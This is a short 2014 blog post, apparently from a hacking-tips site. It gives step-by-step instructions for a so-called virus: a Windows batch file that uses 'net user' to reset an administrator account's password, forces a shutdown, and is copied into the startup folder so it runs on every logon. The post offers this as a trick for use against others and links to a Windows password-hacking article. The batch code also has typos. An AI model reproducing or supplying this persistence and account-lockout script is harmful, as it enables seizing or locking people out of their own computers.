Page Rank Checker

Wednesday 3 September 2014

Virus Which Changes Password On Every Logon


This article is about making a virus that changes password of windows to the password hacker wants on every Log on. Just remember that you must log in with Administrator privileges to performing following trick. Actually idea about this trick is given to me by my friend ‘Punit’ so all credit of this trick is of him. If you don’t know How to hack windows password then read article Hack any Windows Password 100% working - Real Hacking


Now follow the steps to make virus

1.Start your computer with Administrator privilages.
2.Open Notepad and type following code
   @echo of
   net user “user_name_of_account_having_administrator_privilages” “new_password”
   shutdown –s –f –t 15 –c “HELLO WOLWEB”
3.Save it as “changePass.bat”.
4.Open Start menu in search box type “shell:startup” and hit enter.
5.Now you see the files that execute at startup, now copy “changePass.bat” and paste it in folder appear by opening “shell:startup”.

Now everytime computer is start irrespective of old password, password changes to the password written in virus coding.